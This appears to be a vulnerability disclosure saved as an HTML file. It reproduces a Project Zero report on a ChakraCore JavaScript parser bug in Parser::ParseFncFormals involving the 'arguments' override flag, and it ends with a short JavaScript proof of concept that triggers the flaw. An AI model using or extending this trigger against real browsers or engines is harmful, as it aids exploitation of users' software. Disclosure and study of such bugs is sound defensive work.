38 lines
No EOL
1.2 KiB
HTML
38 lines
No EOL
1.2 KiB
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
|
|
|
|
Similar to the issue #1297 . But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
|
|
|
|
template<bool buildAST>
|
|
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
|
|
{
|
|
...
|
|
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
|
|
{
|
|
...
|
|
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
|
|
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
|
|
{
|
|
Assert(lexNode->IsVarLetOrConst());
|
|
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
|
|
lexNode->sxVar.sym->SetSymbolType(STFormal);
|
|
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
|
|
{
|
|
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE
|
|
}
|
|
}
|
|
...
|
|
...
|
|
}
|
|
|
|
PoC:
|
|
-->
|
|
|
|
function f() {
|
|
({a = ([arguments]) => {
|
|
}} = 1);
|
|
|
|
arguments.x;
|
|
}
|
|
|
|
f(); |